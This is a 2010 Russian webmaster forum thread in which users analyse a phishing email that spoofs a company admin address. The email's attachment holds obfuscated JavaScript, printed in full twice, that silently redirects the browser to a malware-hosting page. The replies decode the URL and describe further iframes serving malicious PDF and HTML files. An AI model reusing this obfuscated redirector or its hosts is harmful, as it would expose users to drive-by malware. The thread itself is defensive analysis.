11.06.2010, 14:39 | #1 |
Новичок
Регистрация: 20.08.2008
Сообщений: 37
Вес репутации: 191
|
Попытка взлома сайта? Непонятный JS.
Здравствуйте.
Есть сайт фирмы, на котором заведен адрес admin@***.com, также есть другой адрес фирмы на gmail. 2 дня назад на gmail начали приходить письма, якобы с адреса admin@***.com (на самом деле адреса истинного отправителя левые и меняются от письма к письму) с текстом: This e-mail was send by admin@***.com to notify you that we have temporarily prevented access to your account. We have reasons to beleive that your account may have been accessed by someone else. Please open attached file (open.html) and Follow instructions. open.html содержит следующее: Код:
<script type='text/javascript'>function dX(){};var h=new Date();dX.prototype = {f : function() {var u=function(){};var uY=new Date();var o="";var k=document;var oE=function(){};var l='';this.i=33457;var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];var w=function(){};var p=false;this.pP=false;this.s='';kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');var iK="iK";pK='';this.d="d";uM="";}};this.dK="";var fG=new dX(); var dR="dR";fG.f();hJ=false;</script> Пытаются взломать админ-панель хостинга или админку цмски? Или шелл залить? Прогнал его через _http://jsbeautifier.org/ - получил такое: Код:
<script type='text/javascript'> function dX() {}; var h = new Date(); dX.prototype = { f: function() { var u = function() {}; var uY = new Date(); var o = ""; var k = document; var oE = function() {}; var l = ''; this.i = 33457; var kV = k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')]; var w = function() {}; var p = false; this.pP = false; this.s = ''; kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')] = 'hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, ''); var iK = "iK"; pK = ''; this.d = "d"; uM = ""; } }; this.dK = ""; var fG = new dX(); var dR = "dR"; fG.f(); hJ = false; </script> |
11.06.2010, 15:11 | #2 |
Пожиратель черепашкоВ
Регистрация: 24.12.2008
Адрес: Телемелетрямдия
Сообщений: 4,739
Вес репутации: 395
|
Вроде как делает location.replace (то есть редирект) на сайт a--d--v--a--n--c--e--d--w--o--o--d--t--e--c--h.com/xnu4ej/z.htm (двойные тире я добавил). А что там, фиг его знает.
Само это письмо просто спам.....
__________________
|
11.06.2010, 16:29 | #3 |
Новичок
Регистрация: 20.08.2008
Сообщений: 37
Вес репутации: 191
|
chahlic, спасибо за расшифровку.
Теперь и я, благодаря вам, вижу за этим набором символов url страницы. hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.Shltlm На той странице стоит редирект на фарм-сайт (t--o--l--d--s--p--e--a--k.c--o--m) + в iframe с сайта (c--o--p--b--u--n.r--u:8080/i-n-d-e-x.php?pid=10) подгружается js, который, в свою очередь, открывает еще 2 iframe (pdf и html-файл), в которых сидят вирусяки. Кому интересно - подробнее здесь (отношения к данному сайту не имею, просто нашел там инфу по данному вирусу): _http://community.ca.com/blogs/securityadvisor/ |
11.06.2010, 16:40 | #4 |
Добрый модератор
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
|
Mobiler, а вы любой спам так досконально изучаете?
__________________
Правильный хостинг. В личке бесплатно не отвечаю обычно. |
11.06.2010, 20:08 | #5 |
Новичок
Регистрация: 20.08.2008
Сообщений: 37
Вес репутации: 191
|
Не любой, а только особенные его формы
Обычный спам идет в СПАМ. Просто данное сообщение пришло с доверенного (реально существующего) адреса админа корпоративного сайта (на первый взгляд). Подумал, что данное письмо мог отослать хостер или цмс в ответ на попытки подбора пароля к админке сайта. А может уже что-то поломали и хотят получить больше прав доступа - решил разобраться. |
11.06.2010, 20:43 | #6 |
Bannеd
Регистрация: 17.09.2008
Сообщений: 6,446
Вес репутации: 369
|
Mobiler, нормальный человек не будет писать с "Admin <admin@domain>", нормальный человек будет писать с "Name <name@domain>" (вместо Name может быть и имя конторы, но просто слово Admin это тупость)
admin@domain - это как правило технологический адрес для приема почты, если письма идут с него неожиданно, можно сразу в мусорку |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Непонятный АГС | Megion_su | Яндекс | 27 | 01.10.2010 16:06 |
Непонятный завис перед запуском сайта на VDS | dell | Разработка и сопровождение сайтов | 4 | 19.03.2009 00:06 |
Восстановление проектов оптимазатора после взлома - к администрации. | kolesnicoff | Вопросы по работе системы | 8 | 19.02.2009 23:01 |
Возможность взлома, если известно название папки | lexxx | Вопросы от новичков | 14 | 11.03.2008 06:35 |
Часовой пояс GMT +3, время: 14:08.